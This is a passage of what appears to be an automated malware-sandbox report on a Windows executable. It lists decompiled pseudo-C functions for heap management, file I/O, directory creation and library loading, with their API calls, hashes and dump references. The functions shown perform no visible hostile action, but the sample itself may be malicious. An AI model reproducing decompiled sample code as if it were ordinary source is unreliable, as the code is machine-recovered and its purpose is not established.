					__edx =  *((intOrPtr*)(__esp + 0x10));
					_push( *((intOrPtr*)(__esp + 0x10)));
					__eax = E0040DE20();
					_pop(__edx);
					E0040DFC0(__edx) = __esp + 0x18;
					__eax = E0040DE60(__esp + 0x18, __esp + 0x18);
					__eax = E0040DE20();
					__edx = __edx;
					_push(__eax);
					__eax = E0040DE20();
					__edx = __edx;
					_push(__eax);
					__eax = E0040DE20();
					__edx = __edx;
					_push(__eax);
					__eax = E0040DE20();
					__edx = __edx;
					__eax = E00405182(__eax);
					 *__esp =  *__esp + __edx;
					__eflags =  *__esp;
					E00405E50(__ecx,  *__esp) = __esp + 0x14;
					_push(__esp + 0x14);
					__eax = E0040DE60();
					__eax = E0040DE20();
					__edx = __edx;
					_push(__eax);
					__eax = E0040DE20();
					__edx = __edx;
					E00405EC0(__eflags,  *((intOrPtr*)(__esp + 0x1c)), 0xa) = __esp + 0x14;
					__eax = E0040DE60(__esp + 0x14, __esp + 0x14);
					_push( *((intOrPtr*)(__esp + 0xc)));
					__edx =  *((intOrPtr*)(__esp + 0x14));
					_pop(__ecx);
					__eax = E00405120(__ecx, __edx);
					if(__eflags == 0) {
						L1:
						_push(0);
						ExitProcess(); // executed
						E0040DE00(); // executed
						HeapDestroy( *0x417008); // executed
						ExitProcess(??); // executed
						E00405379();
						E004098F0();
						E0040A655();
						E0040D264(E0040AA30());
						return E00409AD0();
					} else {
						__eax = E004097FE();
						__eax = __eax;
						__eflags = __eax;
						if(__eflags != 0) {
							__eax = E0040DE20();
							__edx = __edx;
							__eax = E0040DE20();
							__edx = __edx;
							__eax = E0040E020(__ecx);
							__edx =  *((intOrPtr*)(__esp + 0x18));
							__ecx = __eax;
							__ecx = E00405160(__ecx);
							__eax = E00405120(__eax, __edx);
							if(__eflags != 0) {
								 *0x417050 = 1;
								__eax = E0040DE20();
								__edx = __edx;
								_push(__eax);
								__eax = E0040DE20();
								__edx = __edx;
								__eax = 0x417020;
								_push(0x417020);
								__eax = E0040DE60();
							}
						}
						__eax = E0040DEF0(__eax,  *((intOrPtr*)(__esp + 4)));
						__eax = E0040DEF0(__eax,  *((intOrPtr*)(__esp + 0xc)));
						__eax = E0040DEF0(__eax,  *((intOrPtr*)(__esp + 8)));
						__eax = E0040DEF0(__eax,  *((intOrPtr*)(__esp + 0x14)));
						__eax = E0040DEF0(__eax,  *((intOrPtr*)(__esp + 0x10)));
						__esp = __esp + 0x18;
						_pop(__ebp);
						return __eax;
					}
				}
			}

APIs

Part of subcall function 0040DF60: TlsGetValue.KERNEL32(0000001B,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C), ref: 0040DF77

Part of subcall function 0040DE20: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE26
Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000001B), ref: 0040DE35
Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B

Part of subcall function 00409638: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 00409654
Part of subcall function 00409638: wcscmp.MSVCRT ref: 00409662
Part of subcall function 00409638: memmove.MSVCRT ref: 0040967A

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00417040,00000000), ref: 00401BCD
EnumResourceTypesW.KERNEL32 ref: 00401BEA
FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401BF2

Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7

Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(02760000,00000000,?), ref: 0040DE99

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$ErrorLastLibrary$AllocateEnumFileFreeHeapLoadModuleNameResourceTypesmemmovewcscmpwcslen
String ID:
API String ID: 983379767-0
Opcode ID: 4ad9618a39c96ebc7cc08c76ef6dd36292b015dc4290505fe387b7f3c1c86b5b
Instruction ID: 3462f3606e8cbb1e1a4d79c74de0940f317b4d1ea5cf6404f74aab9d4bf66b3f
Opcode Fuzzy Hash: 4ad9618a39c96ebc7cc08c76ef6dd36292b015dc4290505fe387b7f3c1c86b5b
Instruction Fuzzy Hash: 4251F7B59047006AE6007BF2DD86E7F66AEDBD4718F10883FB5407D0D2CA3C8C5966AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040AFC0, Relevance: 4.6, APIs: 3, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E0040AFC0(long __edx, void** _a4, void* _a8, long _a12) {
				long _v4;
				long _v8;
				long _v12;
				void* _t36;
				void* _t38;
				void* _t45;
				void* _t49;
				long _t58;
				void* _t63;
				long _t69;
				void** _t75;

				_t75 = _a4;
				_v12 = 0;
				if(_t75[7] != 0) {
					return 0;
				} else {
					if(_t75[5] == 1) {
						_t58 =  ~(_t75[3]);
						asm("cdq");
						_v8 = _t58;
						_v4 = __edx;
						SetFilePointer( *_t75, _t58,  &_v4, 1); // executed
						_t75[5] = 0;
						_t75[3] = _t75[2];
					}
					_t36 = _t75[3];
					_t69 = _a12;
					if(_t36 <= _t69) {
						E0040A9E0(_t75);
						_t38 = _t75[2];
						if(_t69 < _t38) {
							_push(_t69);
							_push(_a8);
							_t63 = _t75[1] - _t75[3] + _t38;
							goto L8;
						} else {
							WriteFile( *_t75, _a8, _t69,  &_v12, 0); // executed
							return _v12;
						}
					} else {
						_t63 = _t75[2] + _t75[1] - _t36;
						_t45 = _t69 - 1;
						if(_t45 == 0) {
							 *_t63 =  *_a8;
							_t75[3] = _t75[3] - _t69;
							return _t69;
						} else {
							_t49 = _t45 - 1;
							if(_t49 == 0) {
								 *_t63 =  *_a8;
								_t75[3] = _t75[3] - _t69;
								return _t69;
							} else {
								if(_t49 == 2) {
									 *_t63 =  *_a8;
									_t75[3] = _t75[3] - _t69;
									return _t69;
								} else {
									_push(_t69);
									_push(_a8);
									L8:
									memcpy(_t63, ??, ??);
									_t75[3] = _t75[3] - _t69;
									return _t69;
								}
							}
						}
					}
				}
			}

APIs

SetFilePointer.KERNELBASE(?,?,?,00000001), ref: 0040AFF8
memcpy.MSVCRT ref: 0040B032

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointermemcpy
String ID:
API String ID: 1104741977-0
Opcode ID: 0eefa4f874f6ecccfca5fc54179e78147f46ecb2304ab69a4aa20b4cccdc9a3e
Instruction ID: ace082a42c8b9570e8fa48c2980c6e4681abbcae92d9a1b023345ff456592002
Opcode Fuzzy Hash: 0eefa4f874f6ecccfca5fc54179e78147f46ecb2304ab69a4aa20b4cccdc9a3e
Instruction Fuzzy Hash: 4B313A392007009FC220DF29D844E5BB7E5EFD8714F04882EE59A97750D335E919CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC70, Relevance: 4.6, APIs: 3, Instructions: 76
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AC70(void* __ebx, void* _a4, WCHAR* _a8) {
				void* _t13;
				long _t16;
				long _t17;
				void* _t19;
				void* _t21;
				void* _t23;
				void* _t24;
				void* _t25;

				_t25 = _a4;
				_t23 = 0;
				_t24 = E0040D438( *0x41771c, _t25);
				if(_t24 == 0) {
					return 0;
				} else {
					_t13 = CreateFileW(_a8, 0xc0000000, 0, 0, 2, 0x80, 0); // executed
					_t21 = _t13;
					if(_t21 != 0xffffffff) {
						L3:
						if(_t21 == 0) {
							goto L10;
						} else {
							_t16 =  *0x41612c; // 0x1000
							if(_t16 == 0) {
								 *(_t24 + 4) = _t23;
							} else {
								 *(_t24 + 4) = HeapAlloc( *0x417008, 0, _t16);
							}
							 *_t24 = _t21;
							_t17 =  *0x41612c; // 0x1000
							 *(_t24 + 0xc) = _t23;
							 *(_t24 + 0x1c) = _t23;
							_t23 = _t24;
							 *(_t24 + 8) = _t17;
							 *((intOrPtr*)(_t24 + 0x14)) = 1;
							 *(_t24 + 0x18) = 2;
							if(_t25 != 0xffffffff) {
								_t23 = _t21;
							}
							if(_t23 == 0) {
								goto L10;
							}
						}
					} else {
						_t19 = CreateFileW(_a8, 0x40000000, 0, 0, 5, 0, 0); // executed
						_t21 = _t19;
						if(_t21 == 0xffffffff) {
							L10:
							if(_t25 != 0xffffffff) {
								_t24 = _t25;
							}
							E0040D3AA( *0x41771c, _t24);
						} else {
							goto L3;
						}
					}
					return _t23;
				}
			}

APIs

Part of subcall function 0040D438: EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040AD75,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D443
Part of subcall function 0040D438: LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040AD75,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040D4BE

CreateFileW.KERNELBASE(00000001,C0000000,00000000,00000000,00000002,00000080,00000000,00000001,00000000,?,?,?,0040474F,FFFFFFFF,?,00000000), ref: 0040ACA3
CreateFileW.KERNELBASE(00000001,40000000,00000000,00000000,00000005,00000000,00000000,?,?,?,0040474F,FFFFFFFF,?,00000000,00000000,00000000), ref: 0040ACBF
HeapAlloc.KERNEL32(00000000,00001000,?,?,?,0040474F,FFFFFFFF,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00403D71), ref: 0040ACE2

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateCriticalFileSection$AllocEnterHeapLeave
String ID:
API String ID: 49537883-0
Opcode ID: 4dd531b9fa248f024298d31622ac81a62092c3937c8fe5ab716ac7b1fb55e9df
Instruction ID: f6fed0e380c2868238a2ed1f5ecffa77528f81bfe2ad71e922a363fc64bec02a
Opcode Fuzzy Hash: 4dd531b9fa248f024298d31622ac81a62092c3937c8fe5ab716ac7b1fb55e9df
Instruction Fuzzy Hash: F821CF31200700ABD3305B2AAC48F57BEA9EFC5B64F11863EF565A36E0D6359815CB29

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE60, Relevance: 4.6, APIs: 3, Instructions: 53
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DE60(void** _a4, intOrPtr _a8) {
				unsigned int _v8;
				intOrPtr* _v12;
				long _t19;
				void* _t23;
				void* _t26;
				void* _t27;
				void* _t41;
				void* _t46;

				_t19 =  *0x416170; // 0x1b
				_v12 = TlsGetValue(_t19);
				_v8 =  *((intOrPtr*)(_v12 + 8)) - _a8;
				if( *_a4 != 0) {
					_t41 =  *0x417720; // 0x2760000
					_t23 = RtlReAllocateHeap(_t41, 0,  *_a4, _v8 + 0xa); // executed
					 *_a4 = _t23;
				} else {
					_t46 =  *0x417720; // 0x2760000
					_t27 = RtlAllocateHeap(_t46, 0, _v8 + 0xa); // executed
					 *_a4 = _t27;
				}
				_t26 = E0040E300( *_v12 + _a8,  *_a4,  *_v12 + _a8, _v8 >> 1);
				 *((intOrPtr*)(_v12 + 8)) = _a8;
				return _t26;
			}

0x0040de66
0x0040de72
0x0040de7e
0x0040de87
0x0040deb5
0x0040debc
0x0040dec5
0x0040de89
0x0040de92
0x0040de99
0x0040dea2
0x0040dea2
0x0040dedc
0x0040dee7
0x0040deed

APIs

TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
RtlAllocateHeap.NTDLL(02760000,00000000,?), ref: 0040DE99
RtlReAllocateHeap.NTDLL(02760000,00000000,?,?), ref: 0040DEBC

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap$Value
String ID:
API String ID: 2497967046-0
Opcode ID: f865e40a7b47dc49b25cd0656b7d544d8748bc79d9d02905389b3cc1b6fb08eb
Instruction ID: e6d91f3b09335801e5746b2964150cf116aaa33277573073d0b775b4e860d931
Opcode Fuzzy Hash: f865e40a7b47dc49b25cd0656b7d544d8748bc79d9d02905389b3cc1b6fb08eb
Instruction Fuzzy Hash: E511B974A00208EFCB04DF98D894EAABBB6FF88315F10C559E9099B354D735AA41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040A665, Relevance: 4.5, APIs: 3, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A665(wchar_t* _a4) {
				short _v8;
				short _v528;
				WCHAR* _t18;
				int _t20;
				signed int _t23;

				if(_a4 == 0) {
					return 0;
				}
				wcsncpy( &_v528, _a4, 0x104);
				_v8 = 0;
				_t18 =  &(( &_v528)[wcslen( &_v528)]);
				while(_t18 >  &_v528) {
					_t23 =  *(_t18 - 2) & 0x0000ffff;
					if(_t23 == 0x20 || _t23 == 0x5c || _t23 == 0x2f) {
						_t18 =  &(_t18[0xffffffffffffffff]);
						continue;
					} else {
						break;
					}
				}
				 *_t18 = 0;
				_t20 = CreateDirectoryW( &_v528, 0); // executed
				return _t20;
			}

0x0040a672
0x00000000
0x0040a6dd
0x0040a683
0x0040a68a
0x0040a6a3
0x0040a6be
0x0040a6a8
0x0040a6af
0x0040a6bb
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a6af
0x0040a6ca
0x0040a6d5
0x00000000

APIs

wcsncpy.MSVCRT ref: 0040A683
wcslen.MSVCRT ref: 0040A695
CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040A6D5

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectorywcslenwcsncpy
String ID:
API String ID: 961886536-0
Opcode ID: 40426c4a27e9655a37d458fcd41d9c62d4d21f52a2c09d6ab7b3f43a5b08421e
Instruction ID: 630a5c6db6187271ae83db4eaeb36511880b8bdc4cdf20ec5a399f16e344c0a7
Opcode Fuzzy Hash: 40426c4a27e9655a37d458fcd41d9c62d4d21f52a2c09d6ab7b3f43a5b08421e
Instruction Fuzzy Hash: 0F01DBB08113189BCB24DB64CC8DABA7378DF00300F6446BBE455E21D1E77A9AA4DB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00408D8E, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00408D8E(void* __ecx) {
				intOrPtr _v8;
				void _v12;
				void* _t7;

				memset( &_v12, 0, 8);
				_v12 = 8;
				_t7 =  &_v12;
				_v8 = 0xb48;
				__imp__InitCommonControlsEx(_t7, __ecx, __ecx);
				__imp__CoInitialize(0); // executed
				return _t7;
			}

0x00408d9b
0x00408da3
0x00408daa
0x00408dad
0x00408db5
0x00408dbd
0x00408dc6

APIs

memset.MSVCRT ref: 00408D9B
InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408DB5
CoInitialize.OLE32(00000000), ref: 00408DBD

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CommonControlsInitInitializememset
String ID:
API String ID: 2179856907-0
Opcode ID: 5fe436f70463189401810c8ea8ae9fa3e8af9a379760f2b470c78f7c9900ce65
Instruction ID: 781e80edae316a95334d3837f50a89f25f26191aceb080d9ad1fe250ea93eb12
Opcode Fuzzy Hash: 5fe436f70463189401810c8ea8ae9fa3e8af9a379760f2b470c78f7c9900ce65
Instruction Fuzzy Hash: 3AE0E6B594030CBBDB409FD0DC0EF9D7B7CE704705F404565F50496181EBB596048B95

Uniqueness

Uniqueness Score: -1.00%

Function 00409860, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409860(WCHAR* _a4, WCHAR* _a8) {
				void* _t4;
				WCHAR* _t5;
				int _t6;

				if(_a4 != 0) {
					_t5 = _a8;
					if(_t5 == 0) {
						_t5 = 0x412024;
					}
					_t6 = SetEnvironmentVariableW(_a4, _t5); // executed
					return _t6;
				}
				return _t4;
			}

0x00409865
0x00409867
0x0040986d
0x0040986f
0x0040986f
0x00409879
0x00000000
0x00409879
0x0040987f

APIs

SetEnvironmentVariableW.KERNELBASE(02769340,02769340,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409879

Strings

$ A, xrefs: 0040986F

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentVariable
String ID: $ A
API String ID: 1431749950-1415209610
Opcode ID: 37dc1e281acc41e39155b599a3fd8d037edce4260b7102e0d6fe6300a43532c6
Instruction ID: 34676badedbb0a82c232a14336f7de5419c85f3fd2839d3c24d176d6e2709967
Opcode Fuzzy Hash: 37dc1e281acc41e39155b599a3fd8d037edce4260b7102e0d6fe6300a43532c6
Instruction Fuzzy Hash: 46C01231604201ABDB11AA16C908F6BBBE6EBA1384F01C43AB985D23B0D338CC90DB09

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD60, Relevance: 3.1, APIs: 2, Instructions: 65
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AD60(void* __ebp, void* _a4, WCHAR* _a8) {
				void* _t12;
				long _t15;
				long _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t22;

				_t18 = _a4;
				_t19 = 0;
				_t20 = E0040D438( *0x41771c, _t18);
				if(_t20 == 0) {
					return 0;
				} else {
					_t12 = CreateFileW(_a8, 0x80000000, 0, 0, 3, 0x80, 0); // executed
					_t22 = _t12;
					if(_t22 == 0xffffffff || _t22 == 0) {
						L9:
						if(_t18 != 0xffffffff) {
							_t20 = _t18;
						}
						E0040D3AA( *0x41771c, _t20);
					} else {
						_t15 =  *0x41612c; // 0x1000
						if(_t15 == 0) {
							 *(_t20 + 4) = 0;
						} else {
							_t17 = RtlAllocateHeap( *0x417008, 0, _t15); // executed
							 *(_t20 + 4) = _t17;
						}
						 *_t20 = _t22;
						_t16 =  *0x41612c; // 0x1000
						 *(_t20 + 0xc) = _t19;
						_t19 = _t20;
						 *(_t20 + 8) = _t16;
						 *((intOrPtr*)(_t20 + 0x14)) = 1;
						 *((intOrPtr*)(_t20 + 0x18)) = 2;
						 *((intOrPtr*)(_t20 + 0x1c)) = 1;
						if(_t18 != 0xffffffff) {
							_t19 = _t22;
						}
						if(_t19 == 0) {
							goto L9;
						}
					}
					return _t19;
				}
			}

APIs

Part of subcall function 0040D438: EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040AD75,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D443
Part of subcall function 0040D438: LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040AD75,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040D4BE

CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000), ref: 0040AD93
RtlAllocateHeap.NTDLL(00000000,00001000,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040ADB5

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$AllocateCreateEnterFileHeapLeave
String ID:
API String ID: 2608263337-0
Opcode ID: 90f7faf706f975316c83b07ac6ced370c6fd09a1887d2f170a25e0c4fd74ef8c
Instruction ID: cb55299900a1a52b407eca00395bc400cfc912b247b49f0a026709af4e8a3faf
Opcode Fuzzy Hash: 90f7faf706f975316c83b07ac6ced370c6fd09a1887d2f170a25e0c4fd74ef8c
Instruction Fuzzy Hash: 0411D031100300ABC2305F5AEC48F57BBAAEFC5761F11863EF5A5A26E0C77698558B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB6A, Relevance: 3.1, APIs: 2, Instructions: 61
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DB6A(signed int _a4, intOrPtr _a8, intOrPtr _a20) {
				void* _v0;
				intOrPtr _v4;
				void* _v8;
				void* _v12;
				void* _t19;
				long _t29;
				void* _t31;
				signed int _t33;
				void* _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				void* _t38;
				void* _t39;

				_t36 = _a20;
				_t34 = 0;
				E0040DCBD(_v0);
				_t33 = _a4;
				if(_t33 > 0) {
					_t29 = _a4 * _t33 + 0x18;
					_t19 = RtlAllocateHeap( *0x417008, 0, _t29); // executed
					_t34 = _t19;
					if(_t34 != 0) {
						 *((intOrPtr*)(_t34 + 4)) = _v4;
						 *((intOrPtr*)(_t34 + 8)) = _a8;
						_t9 = _t29 - 0x18; // 0xffffffc5
						 *(_t34 + 0x10) = _t33;
						 *(_t34 + 0x14) = _a4;
						 *((intOrPtr*)(_t34 + 0xc)) = _t36;
						 *_t34 = 1;
						_t34 = _t34 + 0x18;
						 *(_t38 + 0x30) = _t34;
						memset(_t34, 0, _t9);
						_t39 = _t38 + 0xc;
						_v0 = _t34;
						_t37 = _a8;
						if(E00411744(_a8) != 0 && _t33 > 0) {
							_t31 = _t34;
							_t35 = _v4;
							do {
								E00411B6F(_t31, _t37);
								_t31 = _t31 + _t35;
								_t33 = _t33 - 1;
							} while (_t33 != 0);
							_t34 =  *(_t39 + 0x24);
						}
					}
				}
				return _t34;
			}

APIs

Part of subcall function 0040DCBD: HeapFree.KERNEL32(00000000,-00000018,00000200,00000000,0040DB7B,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,0041607C,00417090,00000004), ref: 0040DCFE

RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C), ref: 0040DB9A
memset.MSVCRT ref: 0040DBD5

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateFreememset
String ID:
API String ID: 2774703448-0
Opcode ID: b4b42cf12e6a71c38c390e7d4c2b16159ff475ec6d8ebd77654cc0985d18a278
Instruction ID: 4684dd51efb4be1c7f6cbbcd141334eab977ef2b41965c3d3424e441a95aa271
Opcode Fuzzy Hash: b4b42cf12e6a71c38c390e7d4c2b16159ff475ec6d8ebd77654cc0985d18a278
Instruction Fuzzy Hash: 8C117C729047149BC320DF49D840A4BBBE8FF98B50F05452EF989A7351D774EC04CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040E200, Relevance: 3.1, APIs: 2, Instructions: 52
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E200(signed int _a4, void* _a8) {
				void** _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				long _t32;
				void* _t44;
				void* _t45;

				_t32 =  *0x416170; // 0x1b
				_v8 = TlsGetValue(_t32);
				if(_a8 == 0xffffffff) {
					_a8 = _v8[2];
				}
				_v12 = _v8[2] + _a4 * 2;
				if(_v12 >= _v8[1] - 4) {
					_v8[1] = _v12 + 0x4000;
					_t44 =  *0x417720; // 0x2760000
					_t45 = RtlReAllocateHeap(_t44, 0,  *_v8, _v8[1] + 0xa); // executed
					 *_v8 = _t45;
				}
				_v16 =  *_v8 + _a8;
				_v8[2] = _a8 + _a4 * 2;
				return _v16;
			}

0x0040e206
0x0040e212
0x0040e219
0x0040e221
0x0040e221
0x0040e230
0x0040e23f
0x0040e24c
0x0040e261
0x0040e267
0x0040e270
0x0040e270
0x0040e27a
0x0040e289
0x0040e292

APIs

TlsGetValue.KERNEL32(0000001B,00001000,00000000,00000000), ref: 0040E20C
RtlReAllocateHeap.NTDLL(02760000,00000000,?,?), ref: 0040E267

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeapValue
String ID:
API String ID: 3894635346-0
Opcode ID: b65472d8892799a2ab790df46868f8da18113432f0cbb7547d7b3206bfd8583f
Instruction ID: 26b5320e93437fcb7b3a7e471c4fbc50e4a3a6070049850fe70d883a15f06819
Opcode Fuzzy Hash: b65472d8892799a2ab790df46868f8da18113432f0cbb7547d7b3206bfd8583f
Instruction Fuzzy Hash: F821A478A00208EFCB00CF98D59499DB7B5FB88314B24C1A9E9199B355D631EE52DF44

Uniqueness

Uniqueness Score: -1.00%

Function 0040A970, Relevance: 3.0, APIs: 2, Instructions: 31
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A970(signed int _a4) {
				void** _t4;
				void** _t11;

				_t9 = _a4;
				if(_a4 != 0xffffffff) {
					_t4 = E0040D3F9( *0x41771c, _t9);
					_t11 = _t4;
					if(_t11 != 0) {
						if(_t11[1] != 0) {
							E0040A9E0(_t11);
							HeapFree( *0x417008, 0, _t11[1]);
						}
						FindCloseChangeNotification( *_t11); // executed
						_t4 = E0040D3AA( *0x41771c, _t9);
					}
					return _t4;
				} else {
					return E0040D995( *0x41771c);
				}
			}

0x0040a971
0x0040a978
0x0040a991
0x0040a996
0x0040a99a
0x0040a9a0
0x0040a9a3
0x0040a9b3
0x0040a9b3
0x0040a9bb
0x0040a9c8
0x0040a9c8
0x0040a9cf
0x0040a97a
0x0040a986
0x0040a986

APIs

HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,004033E8,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000), ref: 0040A9B3
FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,004033E8,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040A9BB

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
